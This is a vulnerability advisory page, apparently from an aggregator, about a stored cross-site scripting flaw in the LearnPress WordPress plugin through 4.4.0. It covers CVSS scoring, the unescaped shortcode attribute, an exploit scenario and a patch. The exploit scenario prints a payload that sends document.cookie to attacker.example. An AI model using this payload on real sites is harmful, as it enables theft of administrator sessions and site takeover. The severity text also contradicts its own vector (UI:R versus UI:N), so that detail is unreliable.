Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Stored XSS requires victim page view (UI:R per CVSS guidance); contributor access required (PR:L); scope changes to victim browser (S:C); no availability impact.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The LearnPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class_wrapper_form' shortcode attribute in versions up to, and including, 4.4.0. This is due to insufficient input sanitization and output escaping in the FilterCourseTemplate::sections() method at line 98, where the attacker-controlled attribute is inserted into an HTML class attribute via sprintf('<form class="%s">', $class_wrapper_form) without esc_attr() escaping. The FilterCourseShortcode::render() handler does not apply shortcode_atts() filtering, so raw user attributes flow directly through do_action('learn-press/filter-courses/layout', $data) into the template. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored Cross-Site Scripting in the LearnPress WordPress LMS plugin (versions up to and including 4.4.0) allows authenticated contributors to permanently inject arbitrary JavaScript into WordPress pages via the unescaped 'class_wrapper_form' shortcode attribute. The payload persists in the database and executes in the browser of any visitor - including administrators - who loads the affected page, enabling session hijacking, credential harvesting, or privilege escalation through forged admin actions. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to hold a WordPress contributor-level account (or higher) on the target site, making this a low-privilege authenticated attack. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The NVD-assigned CVSS 3.1 score of 6.4 (Medium) reflects AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A threat actor registers or obtains a WordPress contributor account on a LearnPress-powered e-learning site, then creates a new page embedding the course-filter shortcode with a crafted class_wrapper_form attribute such as: x"><img src=x onerror=fetch('https://attacker.example/log?c='+document.cookie)>. After the page is published, any administrator who reviews or visits it triggers the payload in their browser, surrendering their session cookie - enabling full site takeover without further authentication. … |
| Remediation | Update LearnPress to a version above 4.4.0; the upstream fix is available in WordPress plugin Trac changeset 3587186 (https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3587186%40learnpress&new=3587186%40learnpress), though an exact patched release version is not independently confirmed from the available data - verify in the WordPress.org plugin changelog before deploying. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Sensitive information exposure in the LearnPress LMS plugin for WordPress (versions up to and including 4.4.1) lets unau
Course enrollment data exposure in LearnPress WordPress LMS plugin (all versions through 4.3.9.1) enables authenticated
Payment bypass in LearnPress WordPress LMS Plugin (all versions ≤ 4.3.5) allows authenticated subscribers to enroll in a
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-40934
GHSA-qrp7-xr7v-h39q